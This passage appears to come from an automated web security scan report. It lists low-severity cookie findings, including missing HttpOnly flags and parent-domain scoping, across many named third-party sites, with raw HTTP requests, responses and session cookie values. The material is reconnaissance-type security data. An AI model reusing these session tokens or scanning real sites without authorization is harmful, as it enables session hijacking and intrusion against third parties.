Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164322722.1303741260.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=164322722.814293328.1303741260.1303741260.1303741260.1; __utmc=164322722; __utmb=164322722.1.10.1303741260

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 14:35:25 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-AWS-Id: ws15
Set-Cookie: ljuniq=Xw061catQYuvMxT:1303742123:pgstats0:m0; expires=Friday, 24-Jun-2011 14:35:23 GMT; domain=.livejournal.com; path=/
Cache-Control: private, proxy-revalidate
ETag: "768345d85a0645590662a213040f76ec"
Vary: Accept-Encoding
Content-Language: en
X-Varnish: 774812408
Age: 0
Via: 1.1 varnish
Content-Length: 2875

{"text":"<table width='100%'><tr><td valign='top' rowspan='2' style='padding-right: 5px;'>\n<div class='normal-users'>\n<ul class='nostyle pkg'>\n<li class='spotlight-1 with-userpic'><span class='user
...[SNIP]...

15.97. http://www.tns-counter.ru/V13a***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tns-counter.ru
Path:	/V13aR%3Evkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388**

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

guid=CB6401004DB58327X1303741223; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.tns-counter.ru; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /V13a***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388 HTTP/1.1
Host: www.tns-counter.ru
Proxy-Connection: keep-alive
Referer: http://vkontakte.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: tns-counter.0.5.3
Date: Mon, 25 Apr 2011 14:20:23 GMT
Content-Type: image/gif
Content-Length: 43
Location: http://www.tns-counter.ru/V13b***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388
Connection: close
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, no-cache=Set-Cookie, max-age=0, proxy-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Pragma: no-cache
Set-Cookie: guid=CB6401004DB58327X1303741223; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.tns-counter.ru; path=/

GIF89a.............!.......,...........L..;

16. Cookie without HttpOnly flag set previous next
There are 205 instances of this issue:

http://ads.adxpose.com/ads/ads.js
https://checkout.netsuite.com/Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl
https://checkout.netsuite.com/Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl
https://checkout.netsuite.com/Netsparkerd83f087f78ee474db97e8aec33de63c2.nl
https://checkout.netsuite.com/core/
https://checkout.netsuite.com/core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl
https://checkout.netsuite.com/core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl
https://checkout.netsuite.com/core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl
https://checkout.netsuite.com/core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl
https://checkout.netsuite.com/core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl
https://checkout.netsuite.com/core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl
https://checkout.netsuite.com/core/styles/pagestyles.nl
https://checkout.netsuite.com/pages/portal/css/main.css
https://checkout.netsuite.com/pages/portal/page_not_found.jsp
https://checkout.netsuite.com/s.nl
http://customer.kronos.com/
https://customer.kronos.com/Default.asp
https://employer.unicru.com/asp/home/login.asp
https://employer.unicru.com/asp/home/login.asp
https://employer.unicru.com/asp/home/login.asp
https://employer.unicru.com/asp/home/login.asp
http://event.adxpose.com/event.flow
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/index.cfm
http://partner-support.wiki.zoho.com/
http://partners.criticalwatch.com/
http://shopping.netsuite.com/app/site/hit/tracker.nl
http://shopping.netsuite.com/app/site/query/additemtocart.nl
http://shopping.netsuite.com/core/styles/pagestyles.nl
http://shopping.netsuite.com/s.nl
http://t5.trackalyzer.com/trackalyze.asp
http://tengrinews.kz/tag/891/
http://www.fusionvm.com/
http://www.gartner.com/technology/contact/contact_gartner.jsp
http://www.iveco-ptc.spb.ru/
http://www.netsuite.com/app/site/hit/tracker.nl
http://www.smpone.com/images/captcha.php
http://www.tresware.com/images/captcha.php
http://www.trucklist.ru/cars/trucks
http://ad.afy11.net/ad
http://ad.amgdgt.com/ads/
http://ad.trafficmp.com/a/bpix
http://ad.trafficmp.com/a/bpix
http://ad.yieldmanager.com/pixel
http://an.yandex.ru/code/47934
http://an.yandex.ru/code/57617
http://an.yandex.ru/code/66894
http://ar.voicefive.com/b/wc_beacon.pli
http://ar.voicefive.com/bmx3/broker.pli
http://b.dclick.ru/image.ng/site=mail.ru&adsize=1x1&pos=all.07041160&transactionID=842057554
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/p
http://b.voicefive.com/b
http://bs.mail.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204
http://bw.pronto.ru/brick/5/167/36/30/125/&rnd=538045407
http://bw.pronto.ru/brick/5/167/36/30/24/&rnd=252896795
http://bw.pronto.ru/brick/5/167/36/30/26/&rnd=556115021
http://bw.pronto.ru/brick/5/167/36/30/28/&rnd=128924368
http://bw.pronto.ru/brick/5/167/36/30/29/&rnd=443104168
http://bw.pronto.ru/brick/5/167/36/30/37/&rnd=179025170
http://bw.pronto.ru/brick/5/167/36/30/44/&rnd=3108367
http://bw.pronto.ru/brickgrid/5/167/36/30/138/29/&rnd=808462191
http://bw.pronto.ru/brickgrid/5/167/36/30/236/49/&rnd=44849087
http://bw.pronto.ru/brickgrid/5/167/36/30/30/15/&rnd=555318316
http://bw.pronto.ru/brickgrid/5/167/36/30/31/16/&rnd=189356183
https://checkout.netsuite.com/s
http://core1.node15.top.mail.ru/counter
http://core2.node12.top.mail.ru/counter
http://count.rbc.ru/p712.gif
https://customer.kronos.com/Default.asp
https://customer.kronos.com/user/forgotpassword.asp
https://customer.kronos.com/user/forgotusername.asp
https://customer.kronos.com/user/logindenied.asp
http://d7.zedo.com/img/bh.gif
http://fc.ef.d4.cf.bd.a1.top.mail.ru/counter
http://goods.adnectar.com/analytics/get_avia_js
http://idcs.interclick.com/Segment.aspx
http://ideco-software.ru/products/ims/
http://imagesrv.gartner.com/cio/css/main.css
http://imagesrv.gartner.com/js/utility_tech.js
http://kronos.d1.sc.omtrdc.net/b/ss/kronos-dev/1/H.22.1/s64896461574826
http://mail.ru/
http://map.media6degrees.com/orbserv/aopix
http://mc.yandex.ru/watch/57617
http://pda.loveplanet.ru/
http://pixel.fetchback.com/serve/fb/pdc
http://pixel.quantserve.com/pixel
http://pixel.rubiconproject.com/tap.php
http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil
http://pl.yumenetworks.com/static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif
http://pogoda.webalta.ru/
http://pretty.ru/
http://r2.mail.ru/b12179277.gif
http://r2.mail.ru/b12179279.gif
http://r2.mail.ru/b12179280.gif
http://r2.mail.ru/b12201458.png
http://r2.mail.ru/b12526055.gif
http://r2.mail.ru/b12526056.jpg
http://r2.mail.ru/b12526057.jpg
http://r2.mail.ru/b12526058.jpg
http://r2.mail.ru/b12526059.jpg
http://r2.mail.ru/b12526060.jpg
http://r2.mail.ru/b12526061.jpg
http://r2.mail.ru/b12526062.jpg
http://r2.mail.ru/b12526063.jpg
http://r2.mail.ru/b12526064.jpg
http://r2.mail.ru/b12526065.gif
http://r2.mail.ru/b12526191.gif
http://r2.mail.ru/b12526192.gif
http://r2.mail.ru/b12526193.gif
http://r2.mail.ru/b12526194.gif
http://r2.mail.ru/b12526208.gif
http://r2.mail.ru/b12526210.gif
http://r2.mail.ru/b12527647.gif
http://r2.mail.ru/b12529050.jpg
http://r2.mail.ru/b12530142.jpg
http://r2.mail.ru/b12530159.jpg
http://r2.mail.ru/b12531249.jpg
http://r2.mail.ru/b12531545.jpg
http://r2.mail.ru/b12531624.jpg
http://r2.mail.ru/b12532203.jpg
http://r2.mail.ru/b12752186.jpg
http://r2.mail.ru/b12752583.jpg
http://r2.mail.ru/b12752584.jpg
http://r2.mail.ru/b12752585.jpg
http://r2.mail.ru/b12752586.jpg
http://r2.mail.ru/b12855502.png
http://r2.mail.ru/b12887675.jpg
http://r2.mail.ru/b12887676.jpg
http://r2.mail.ru/b12887677.jpg
http://r2.mail.ru/b12961140.jpg
http://r2.mail.ru/b12961154.jpg
http://r2.mail.ru/b12961373.jpg
http://r2.mail.ru/b12962356.jpg
http://r2.mail.ru/b12963308.jpg
http://r2.mail.ru/b12965362.jpg
http://r2.mail.ru/b12968616.jpg
http://r2.mail.ru/b12979027.jpg
http://r2.mail.ru/b13039712.jpg
http://r2.mail.ru/b13044176.jpg
http://r2.mail.ru/b13049054.jpg
http://r2.mail.ru/b13050852.jpg
http://r2.mail.ru/b13057590.swf
http://r2.mail.ru/b13058787.jpg
http://r2.mail.ru/b13058840.jpg
http://r2.mail.ru/b13058851.jpg
http://r2.mail.ru/b13058852.jpg
http://r2.mail.ru/b13058968.jpg
http://r2.mail.ru/b13059223.jpg
http://r2.mail.ru/b13059860.jpg
http://r2.mail.ru/b13060405.jpg
http://r2.mail.ru/b13060487.jpg
http://r2.mail.ru/b13061099.jpg
http://rbcgaru.hit.gemius.pl/_1303741244306/rexdot.gif
http://rbcgaru.hit.gemius.pl/_1303741312919/rexdot.gif
http://segment-pixel.invitemedia.com/pixel
http://shopping.netsuite.com/s.nl
http://show.multiclick.ru/blank.php
http://stats.kroogy.com/cnt-gif1x1.php
http://storage.trafic.ro/js/trafic.js
http://t2.trackalyzer.com/trackalyze.asp
http://top5.mail.ru/counter
http://translate.googleapis.com/translate_a/t
http://vkontakte.ru/login.php
http://wtssdc.gartner.com/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif
http://www.eset.com/us/
https://www.fusionvm.com/FusionVM/
http://www.gartner.com/0_admin/css/documentdisplay.css
http://www.gartner.com/0_admin/css/docverterNGRA.css
http://www.gartner.com/0_admin/images/documentdisplay/blue_gt_bullet.gif
http://www.gartner.com/0_admin/images/documentdisplay/blue_v_bullet.gif
http://www.gartner.com/0_admin/images/documentdisplay/dl_pdf.gif
http://www.gartner.com/0_admin/images/documentdisplay/gartner_logo.gif
http://www.gartner.com/0_admin/images/documentdisplay/gray_gt_bullet.gif
http://www.gartner.com/0_admin/images/documentdisplay/research_logo.gif
http://www.gartner.com/DisplayDocument
http://www.gartner.com/images/x.gif
http://www.gartner.com/js/utility.js
http://www.gartner.com/js/webtrendsCookies.js
http://www.googleadservices.com/pagead/conversion/1069716420/
http://www.googleadservices.com/pagead/conversion/1072501689/
http://www.kronos.com/
http://www.livejournal.com/tools/endpoints/journalspotlight.bml
http://www.netsuite.com/pages/portal/page_not_found.jspinternal=T
http://www.smpone.com/
http://www.smpone.com/404.php
http://www.smpone.com/News-more-79.html
http://www.smpone.com/News-more-80.html
http://www.smpone.com/News.html
http://www.smpone.com/Sections-read-10.html
http://www.smpone.com/Sections-read-125.html
http://www.smpone.com/Sections-read-126.html
http://www.smpone.com/Sections-read-16.html
http://www.smpone.com/Sections-read-20.html
http://www.smpone.com/Sections-read-21.html
http://www.smpone.com/Sections-read-29.html
http://www.smpone.com/Sections-read-3.html
http://www.smpone.com/Sections-read-30.html
http://www.smpone.com/Sections-read-7.html
http://www.smpone.com/Static-contact.html
http://www.tns-counter.ru/V13a***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388
http://www.tresware.com/
http://www.tresware.com/CustomPHPProgrammingNJ.html
http://www.tresware.com/Static-contact.html
http://www.tresware.com/webcontentmanagementNJ.html

16.1. http://ads.adxpose.com/ads/ads.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ads.adxpose.com
Path:	/ads/ads.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=D12D472907FE3E04E0769EB34E0D8495; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_289668 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888
If-None-Match: "0-gzip"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D12D472907FE3E04E0769EB34E0D8495; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 14:23:16 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...

16.2. https://checkout.netsuite.com/Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=L0xGN1TCcVCQPS8pHhg9qBGd76gpyCfS7FnHbzfnFl2LQNGjJvrzfh6fNyfBxr6h2LllvDnWDV1VRT3fh8GLJQYNFyskhxdG51gGXN5XF7N0GMrVt0mxL6vQyQSnT8pW!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.3. https://checkout.netsuite.com/Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=2RW7N1TCBHr6mQJSv4MJrzV9rnyz359DTygvK7qTzvf13vCc2x2x2JXm5QLhrNbJJQcTCgFLGHhsGp0VQ7FwRJ4b5TpDvcFrLL1Jh18S7vw1h5R7dYbgwShCL6v1QX0C!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.4. https://checkout.netsuite.com/Netsparkerd83f087f78ee474db97e8aec33de63c2.nl previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/Netsparkerd83f087f78ee474db97e8aec33de63c2.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=6gtrN1TV8C9xXWGTLVWNMvDTBLMyV755hCYflZPh1YC9G3WhlHnpqmr03yRfTfPYQpX2lCD12TQ2p4sh2qzn2CRFHBYp2ypxXQ0Ts2HJkxK7TM4GT0WGNXlr2vhsWDqh!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.5. https://checkout.netsuite.com/core/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/core/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=hWd4N1GZGdsflwhjP8VdVGSnB6r2GzJ3SBh92hgS8gqlwWGNvByZJhtmP17wL8Hj9JwLc1dn5gjrrtXLMVZXhDnw7vvQwTP4mMBtPt3ds55G4vp4gF1Zr97r3DHpyLCR!-1220802186; path=/
NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:27:05 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.6. https://checkout.netsuite.com/core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=9pncN1TcCnWLkfJJbLpSq1RR7PL6tyTTw0hR5QMhqLwnSDCyGTFJxJhYwyJYDpG2wJdSpSJy1FLV6lXT1thXwK1jrhJvlSP8KCMDHGZd8DVZ2nQZC2pLR3HTpPgQDCQp!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.7. https://checkout.netsuite.com/core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=JwDGN1TRX3qFJhPv0tBSnhLkTmpW34vhDRvgTkwqLXK4SnvMG3VM1xdGYpsFmKLXPJGL5yG5Lk8PK7KS4HKnfNNzcdJH2J9GRhFDsWdQlvhZyXNFZGnBbnGLKb2GLgXj!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.8. https://checkout.netsuite.com/core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=C9RcN1TT8snZLj3J8hCcFmJpQ654HjYQZ4F5LCvBvTZ29f1ZnThL0wQpBFWf522QQvf7TN89dBTvLfjsSzfJD1yGKG3D0xhy3Ryv7M0c6rzkzZB1SlWMFLwchzvhwnV2!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.9. https://checkout.netsuite.com/core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=MKB8N1NDfnQgHZLLbYDLh4z8yFybC5QDpN14nhTHyDDLBGWlh1d9yCB5hmlfvFCpH1Y1YByvTLKmHv2s5tFSs0FxbnfmZJM1Zpdqds57MzgTGCMyNN5C3zzpW0WtRYhQ!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.10. https://checkout.netsuite.com/core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=kpy0N1TTsKDkPgBGQZchFwhNP2xxQDtJvfwQVvtynWwgQLL0vwPLg1KTvflJQHp8yCnphBG9nfKqGrnvy0Cy2pxD6Br4LW1B7KYyndJyk1mBF7whWgydLzFw85SwJwvl!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.11. https://checkout.netsuite.com/core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=pmQ9N1TXzfvBjH2mhF3Q1jKgWhcfCCjndsRvYYL3lv5kb0VQfGTyhhQQQbjmYcLvyCNhp8Kf20GD1QlTR1F2jfcsTn5Lr1hW0SLCmSrGVSrcZnXL5rhglQsqv9ZFVhG2!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.12. https://checkout.netsuite.com/core/styles/pagestyles.nl previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/core/styles/pagestyles.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=tXQJN1GWSQGJhxgnQLglP9K2nC3JgRj49hbDh6pTpzfsTnRKQQ1Dk0D1X5PfwJGyCLhxyJQfpJxpGHzCJV4sK1VsMCzpln6GNyht1gnPJpDGpHp3rdQFqyYz8rzCzbJN!-1435542349; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.13. https://checkout.netsuite.com/pages/portal/css/main.css previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/pages/portal/css/main.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=2ln9N1PQC1pBlnRWMG11FTSzZ6Q7LFs2lFNbJYnZ9dvJs5NzSj9RQKLJB0jQbCcLrsWnHTJhh0vdnB0mgnkmGyrxYmLv5WCDzrjppnpZy6JLTGMDpZ7c9R9LvKTjTMqt!-1598522165; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.14. https://checkout.netsuite.com/pages/portal/page_not_found.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/pages/portal/page_not_found.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=0K8PN1GJqgGn0JkkHrzfLxHcVjNhkHczxJ5J34JfcXdnJGwzK09nybznnTnCvp8D498vLcRWvvh2CF7BJVDVQrVtHmgnlt8tVTVJzTsP1cDqMsf7gd27xTwt1BJB9BL4!-1927254259; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.15. https://checkout.netsuite.com/s.nl previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/s.nl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=B5nHN1Gc4ybGGqDmBpJGQWc4zLmmTVYkQCRtT62dbcTHJ21Gh0nyXcRkBNW8L2lLYXTlBCqgWNYv81PF1jh1nnCgkxLb691G2fmtYTf9gXpBvLwyvDgFJKknzh1Q5jQD!-620026609; path=/
NLVisitorId=rcHW8495AWICDiX0; domain=checkout.netsuite.com; expires=Sunday, 15-Apr-2012 14:26:36 GMT; path=/
NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:26:36 GMT; path=/
NS_VER=2011.1.0; domain=checkout.netsuite.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.16. http://customer.kronos.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://customer.kronos.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDQASQRRDR=DIMMPBCAPHHPGGNHONJOMKDE; path=/
KronosCust=LogIn=false; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: customer.kronos.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1303738433760-48782#1303740624|check#true#1303738824; s_cc=true; s_nr=1303738765059; s_invisit=true; s_lv=1303738765060; s_lv_s=First%20Visit; s_gpv_page=kronos%3Acustomer-support-login.aspx; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.3.10.1303738437

Response

HTTP/1.1 302 Object moved
Date: Mon, 25 Apr 2011 13:39:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: https://customer.kronos.com/Default.asp
Content-Length: 160
Content-Type: text/html
Set-Cookie: KronosCust=LogIn=false; path=/
Set-Cookie: ASPSESSIONIDQASQRRDR=DIMMPBCAPHHPGGNHONJOMKDE; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://customer.kronos.com/Default.asp">here</a>.</body>

16.17. https://customer.kronos.com/Default.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://customer.kronos.com
Path:	/Default.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDQASQRRDR=GKMMPBCAFDPKJBLLDIIBOHPD; path=/
KronosCust=LogIn=false; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.18. https://employer.unicru.com/asp/home/login.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://employer.unicru.com
Path:	/asp/home/login.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDQCDRBTRC=NNLPKKJCDHNIPJJGHAECJHGA; path=/
Emp=datpwx=&UN=&SkipSSL=&PT=&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&MultipleLocation=&RowsPerPage=&CID=&EUID=; path=/
KTMDWestLB=385942538.20736.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.19. https://employer.unicru.com/asp/home/login.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://employer.unicru.com
Path:	/asp/home/login.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDSSRADQTB=EINNMKJCGHFFJHCJOHNLPDMM; path=/
Emp=datpwx=&UN=&SkipSSL=&PT=&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&MultipleLocation=&RowsPerPage=&CID=&EUID=; path=/
KTMDWestLB=1211368202.20736.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.20. https://employer.unicru.com/asp/home/login.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://employer.unicru.com
Path:	/asp/home/login.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDSSRCBTSB=MCAKPIJCNPCBKCIMDMJHBHMD; path=/
KTMDWestLB=993264394.20736.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.21. https://employer.unicru.com/asp/home/login.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://employer.unicru.com
Path:	/asp/home/login.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDSAATCQTA=MGBECJJCAMBAEKDDNHDKHNIH; path=/
KTMDWestLB=184615946.20736.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

